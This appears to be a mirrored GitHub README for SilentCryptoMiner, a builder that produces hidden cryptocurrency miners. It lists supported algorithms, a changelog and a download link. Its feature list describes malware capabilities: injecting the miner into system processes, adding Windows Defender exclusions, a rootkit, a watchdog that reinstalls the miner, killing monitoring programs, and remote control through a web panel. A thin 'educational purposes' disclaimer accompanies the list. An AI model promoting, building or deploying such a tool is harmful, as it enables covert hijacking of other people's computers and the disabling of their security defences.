Elon-Sarif / SilentCryptoMiner

A Silent (Hidden) Free Crypto Miner Builder - Supports ETH, ETC, XMR and many more.

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

SilentCryptoMiner v2.1.0 - Miner for ETH, ETC, XMR, RTM & more

After being in development for a very long time and after having been remade multiple times, this unified miner of my ETH and XMR miners is finally ready for release.

This miner can mine all the following algorithms and thus any cryptocurrency that uses one of them:

List of algorithms
AlgorithmExample Cryptocurrency
ethashEthereum, Metaverse, Callisto, QuarkChain, EtherGem, Etho, Expanse, Ellaism
etchashEthereum Classic
rx/0Monero
grRaptoreum
argon2/chukwa2ACoin
rx/arqArQmA
cn-heavy/xhvHaven, Blockcloud
cn/ccxConceal
astrobwtDero
cn/fastElectronero, ElectroneroXP
rx/kevaKevacoin
cn-picoKryptokrona
cn/halfMasari
argon2/ninjaNinjaCoin
kawpowRavencoin
rx/sfxSafex
cn/rSumokoin
cn-pico/tloTalleo
argon2/chukwav2Turtlecoin
cn/upx2Uplexa
rx/wowWownero
cn/zls
cn/double
cn/2
cn/xao
cn/rwz
cn/rto
cn-heavy/tube
cn-heavy/0
cn/1
cn-lite/1
cn-lite/0
cn/0

Main Features

  • Native & .NET - Miner installer/injector and watchdog coded in C#, Shellcode loader/injector coded in C, miner requires .NET Framework 4.5
  • Shellcode - All .NET C# parts are converted into Shellcode and injected using a native C loader, can be disabled
  • Injection (Silent/Hidden) - Hide miner behind another process like explorer.exe, conhost.exe, svchost.exe and others
  • Idle Mining - Can be configured to mine at different CPU and GPU usages or not at all while computer is or isn't in use
  • Stealth - Pauses the miner and clears the GPU memory while any of the programs in the "Stealth Targets" option are open
  • Watchdog - Monitors the miner file and replaces the file if removed and starts it if the injected miner is closed down
  • Multiple Miners - Can create multiple miners to run at the same time, for example one XMR (CPU) miner and one ETH (GPU) miner
  • CPU & GPU Mining - Can mine on Both CPU and GPU (Nvidia & AMD)
  • Bypass Windows Defender - Can add exclusions into Windows Defender to avoid being detected
  • Process Killer - Constantly checks for any programs in the "Kill Targets" list and kills them if found
  • Remote Configuration - Can get the miner settings remotely from a specified URL every 100 minutes
  • Web Panel Support - Has support for monitoring and configuring all the miners efficiently in an online web panel

Downloads

Pre-Compiled: https://github.com/UnamSanctam/SilentCryptoMiner/releases

Wiki

You can find the wiki here or at the top of the page. The wiki contains information about the miner and all of its features, it also has some answers to frequently asked questions.

Web Panel

You can find the web panel that the miner officially supports here: UnamWebPanel. The web panel can be used to monitor your miners hashrate, status, connection settings and more. It can also be used to change the miner settings just like how the option "Remote Configuration" does it.

Changelog

v2.1.0 (09/01/2022)

  • Added Ghost Rider algorithm, mainly used for the coin Raptoreum
  • Added JSON generator inside builder for easier "Remote Configuration" and web panel configuration creation
  • Added rootkit helper signatures to relevant files to ensure that files and processes are not hidden from the miner processes
  • Added new "Out of free VRAM" status for the web panel if no GPU has enough current free VRAM to mine the selected coin
  • Added "remote-config" and "api-endpoint" configuration options for the "Remote Configuration" and web panel configurations
  • Changed save/load form serialization to also save checkbox and toggle text states
  • Changed default "Startup" "Filename" due to certain anticheats blocking default "Startup" folder access
  • Changed "Shellcode Loader" code and overall flow
  • Improved rootkit stability and stealth
  • Cleaned up messy and unclear form control names, breaks old save compatibility

v2.0.1 (09/11/2021)

  • Removed Hide File option due to it restricting the file from being written to, thus enabling it to cause unwanted behaviour and bugs
  • Fixed possible bug where the random encryption keys could be generated with illegal characters
  • Fixed builder bug where it didn't clear the miner set for the Watchdog between builds
  • Fixed Monero icon

v2.0.0 (08/11/2021)

  • Initial release

You can view the full Changelog here

Author

  • Unam Sanctam

Disclaimer

I, the creator, am not responsible for any actions, and or damages, caused by this software.

You bear the full responsibility of your actions and acknowledge that this software was created for educational purposes only.

This software's main purpose is NOT to be used maliciously, or on any system that you do not own, or have the right to use.

By using this software, you automatically agree to the above.

License

This project is licensed under the MIT License - see the LICENSE file for details

Donate

XMR: 8BbApiMBHsPVKkLEP4rVbST6CnSb3LW2gXygngCi5MGiBuwAFh6bFEzT3UTufiCehFK7fNvAjs5Tv6BKYa6w8hwaSjnsg2N

BTC: bc1q26uwkzv6rgsxqnlapkj908l68vl0j753r46wvq

ETH: 0x40E5bB6C61871776f062d296707Ab7B7aEfFe1Cd

ETC: 0xd513e80ECc106A1BA7Fa15F1C590Ef3c4cd16CF3

RVN: RFsUdiQJ31Zr1pKZmJ3fXqH6Gomtjd2cQe

LINK: 0x40E5bB6C61871776f062d296707Ab7B7aEfFe1Cd

DOGE: DNgFYHnZBVLw9FMdRYTQ7vD4X9w3AsWFRv

LTC: Lbr8RLB7wSaDSQtg8VEgfdqKoxqPq5Lkn3

About

A Silent (Hidden) Free Crypto Miner Builder - Supports ETH, ETC, XMR and many more.

License:MIT License


Languages

Language:C# 98.5%Language:C 0.9%Language:Visual Basic .NET 0.7%